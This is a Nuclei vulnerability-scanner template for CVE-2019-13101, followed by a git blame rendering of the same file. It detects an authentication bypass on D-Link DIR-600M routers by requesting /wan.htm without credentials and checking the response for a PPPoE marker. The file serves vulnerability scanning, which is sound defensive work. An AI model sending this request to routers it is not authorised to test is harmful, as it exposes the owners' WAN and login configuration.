nuclei-templates/cves/2019/CVE-2019-13101.yaml

id: CVE-2019-13101

info:
  author: Suman_Kar
  name: D-Link DIR-600M - Authentication Bypass
  description: An issue was discovered on D-Link DIR-600M 3.02, 3.03, 3.04, and 3.06 devices. wan.htm can be accessed directly without authentication, which can lead to disclosure of information about the WAN, and can also be leveraged by an attacker to modify the data fields of the page.
  severity: critical
  tags: cve,cve2019,dlink,router,iot
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2019-13101
    - https://github.com/d0x0/D-Link-DIR-600M
    - https://www.exploit-db.com/exploits/47250
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.80
    cve-id: CVE-2019-13101
    cwe-id: CWE-306

requests:
  - raw:
      - |
        GET /wan.htm HTTP/1.1
        Host: {{Hostname}}
        Origin: {{BaseURL}}

    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200

      - type: word
        words:
          - "/PPPoE/"
        part: body
D-Link DIR-600M Router - Authentication Bypass 2021-07-03 00:20:40 +00:00			`id: CVE-2019-13101`

			`info:`
			`author: Suman_Kar`
			`name: D-Link DIR-600M - Authentication Bypass`
strict matchers 2021-07-03 18:37:30 +00:00			`description: An issue was discovered on D-Link DIR-600M 3.02, 3.03, 3.04, and 3.06 devices. wan.htm can be accessed directly without authentication, which can lead to disclosure of information about the WAN, and can also be leveraged by an attacker to modify the data fields of the page.`
D-Link DIR-600M Router - Authentication Bypass 2021-07-03 00:20:40 +00:00			`severity: critical`
strict matchers 2021-07-03 18:37:30 +00:00			`tags: cve,cve2019,dlink,router,iot`
Removed pipe (\|) character from references, because the structure requires it to be a string slice, not a string Related nuclei tickets: * #259 - dynamic key-value field support for template information * #940 - new infos in template * #834 * RES-84 2021-08-18 11:37:49 +00:00			`reference:`
Satisfying the linter (all errors and warnings) * whitespace modifications only 2021-08-19 14:44:46 +00:00			`- https://nvd.nist.gov/vuln/detail/CVE-2019-13101`
			`- https://github.com/d0x0/D-Link-DIR-600M`
			`- https://www.exploit-db.com/exploits/47250`
Added cve annotations + severity adjustments 2021-09-10 11:26:40 +00:00			`classification:`
			`cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H`
			`cvss-score: 9.80`
			`cve-id: CVE-2019-13101`
			`cwe-id: CWE-306`
D-Link DIR-600M Router - Authentication Bypass 2021-07-03 00:20:40 +00:00
			`requests:`
			`- raw:`
			`- \|`
strict matchers 2021-07-03 18:37:30 +00:00			`GET /wan.htm HTTP/1.1`
D-Link DIR-600M Router - Authentication Bypass 2021-07-03 00:20:40 +00:00			`Host: {{Hostname}}`
			`Origin: {{BaseURL}}`

strict matchers 2021-07-03 18:37:30 +00:00			`matchers-condition: and`
D-Link DIR-600M Router - Authentication Bypass 2021-07-03 00:20:40 +00:00			`matchers:`
			`- type: status`
			`status:`
Update CVE-2019-13101.yaml iot tag added 2021-07-03 12:25:11 +00:00			`- 200`
strict matchers 2021-07-03 18:37:30 +00:00
			`- type: word`
			`words:`
			`- "/PPPoE/"`
			`part: body`